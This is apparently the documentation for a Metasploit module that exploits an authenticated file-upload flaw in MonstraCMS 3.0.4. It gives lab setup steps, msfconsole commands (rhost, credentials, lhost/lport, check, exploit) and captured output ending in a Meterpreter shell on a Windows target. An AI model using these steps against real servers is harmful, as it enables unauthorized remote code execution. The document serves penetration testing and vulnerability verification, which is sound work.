2.3 KiB
2.3 KiB
Description
MonstraCMS 3.0.4 allows users to upload arbitrary files which leads to remote command execution on the remote server. An attacker may choose to upload a file containing PHP code and run this code by accessing the resulting PHP file. This module was tested against MonstraCMS 3.0.4. Additional information and vulnerabilities can be viewed on Exploit-DB 43348.
Verification Steps
Available at Exploit-DB
Vulnerable Application Installation Setup
- Download Application :
https://www.exploit-db.com/apps/23663fc7b47c4c1e476b793ea53660bc-monstra-3.0.4.zip - Extract :
23663fc7b47c4c1e476b793ea53660bc-monstra-3.0.4.zip - Move In WebDirectory :
C:\xampp\htdocs\ - Now Visit : http://localhost/
Verification Steps
- Install the application
- Start msfconsole
- Do:
use exploit/multi/http/monstra_fileupload_exec - Do:
set rport <port> - Do:
set rhost <ip> - Do:
set targeturi monstra - Do:
set username USERNAME - Do:
set password PASSWORD - Do:
check
[*] Monstra CMS: 3.0.4
[+] 192.168.0.101:80 The target is vulnerable.
- Do:
set lport <port> - Do:
set lhost <ip> - Do:
exploit - You should get a shell.
Scenarios
Monstra CMS on Windows Target
msf exploit(multi/http/monstra_fileupload_exec) > check
[*] Monstra CMS: 3.0.4
[+] 192.168.0.101:80 The target is vulnerable.
msf exploit(multi/http/monstra_fileupload_exec) > exploit
[*] Started bind handler
[*] Trying to Login ......
[+] Authentication successful : [ editor : editor ]
[+] CSRF-Token for File Upload : 2a67a7995c15c69a158d897f517e3aff2e3a4ae9
[*] Trying to upload file with malicious Content....
[*] Executing Payload
[*] Sending stage (37775 bytes) to 192.168.0.101
[*] Meterpreter session 1 opened (10.0.2.15:45689 -> 192.168.0.101:4444) at 2018-06-30 12:39:53 +0530
[+] Deleted TSPfeLYdMP.PHP
meterpreter > sysinfo
Computer : 114619-T470P
OS : Windows NT 114619-T470P 10.0 build 16299 (Windows 10) AMD64
Meterpreter : php/windows
meterpreter >